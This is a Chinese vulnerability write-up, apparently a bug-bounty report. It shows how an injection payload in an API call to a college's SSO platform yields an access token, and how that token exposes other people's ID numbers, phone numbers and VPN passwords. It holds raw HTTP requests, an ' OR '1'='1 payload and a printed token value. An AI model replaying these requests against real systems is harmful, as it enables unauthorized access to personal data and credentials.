某政法学院token泄露导致敏感数据泄露
提前说已上传edusrc

访问一个sso登录平台会加载很多前端代码
在其中发现/r/jd?cmd=com.awspaas.user.apps.magicportal_expression的api
并构造数据包
POST /r/jd?cmd=com.awspaas.user.apps.magicportal_expression HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
sid=&script=@ATExecInterface(Interface20231124001,GH:2103019|pageNo:0|pageSize:1)
发现在返回包

其中返回了
流程名称
entry
owner 账号 / 姓名
当前状态
表单渲染 URI
为后续跨系统读取提供入口
之后测试修改post内容后
sid=&script=@ATExecInterface(Interface20231124001,GH:21404235' OR '1'='1|pageNo:0|pageSize:1)
发包后发现返回一个accesstoken

带token去访问3个地址
/infoplus/apis/v2/user//processes/doing
/infoplus/apis/v2/process/
/infoplus/apis/v2/process/
第一个地址获得entry
GET /infoplus/apis/v2/user/2103019/processes/doing?access_token=2ca42ac3a7f2c4f97b7a30b548b54a32&start=0&limit=1 HTTP/1.1
返回数据

entry=1580724
可看见他人研究生处 VPN 及堡垒机申请
GET /infoplus/apis/v2/process/1580724?access_token= HTTP/1.1
可看见他人身份证号,手机号,邮箱
GET /infoplus/apis/v2/process/1580724/data?access_token= HTTP/1.1

泄露VPN 账号密码
GET /infoplus/apis/v2/process/1584457/data?access_token= HTTP/1.1

均可遍历
后续发现这个token为高权限读取权限
能读到他人研究生处 VPN 及堡垒机申请
其中包含很多敏感信息
温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。
涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。
如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。
